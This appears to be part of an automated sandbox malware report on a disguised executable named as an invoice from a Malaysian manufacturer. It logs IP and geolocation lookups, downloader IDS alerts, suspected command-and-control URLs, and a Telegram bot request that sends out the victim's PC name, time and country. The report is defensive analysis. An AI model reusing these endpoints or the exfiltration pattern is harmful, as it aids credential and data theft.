                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                    Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                    Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: checkip.dyndns.org
                    Source: unknownDNS query: name: reallyfreegeoip.org
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49711 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49712 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49723 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49719 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.10:49706 -> 193.122.6.168:80
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49710 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49725 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49718 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49715 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49721 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49730 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49720 -> 188.114.97.3:443
                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.10:49726 -> 188.114.97.3:443
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49707 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.10:49717 version: TLS 1.0
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2030/08/2024%20/%2000:43:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20and%20Time:%2029/08/2024%20/%2019:20:11%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20301389%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                    Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                    Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 29 Aug 2024 10:16:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1280413561.00000000024A9000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 0000000C.00000002.1319580024.000000000328E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002D61000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:301389%0D%0ADate%20a
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ED9000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002ECF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enp
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 00000000.00000002.1283369274.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DB4000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3732114223.0000000000433000.00000040.00000400.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.0000000003284000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E49000.00000004.00000800.00020000.00000000.sdmp, Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002E23000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000032F4000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000331E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3743316325.0000000004026000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3741871407.00000000044F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DF000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.000000000333C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, GhrKoSGuCdvpJ.exe, 00000014.00000002.3735840864.00000000033DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                    Source: Autofill Manufacturing Sdn Bhd 28-08-2024.exe, 0000000B.00000002.3737458655.0000000002F00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/p
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
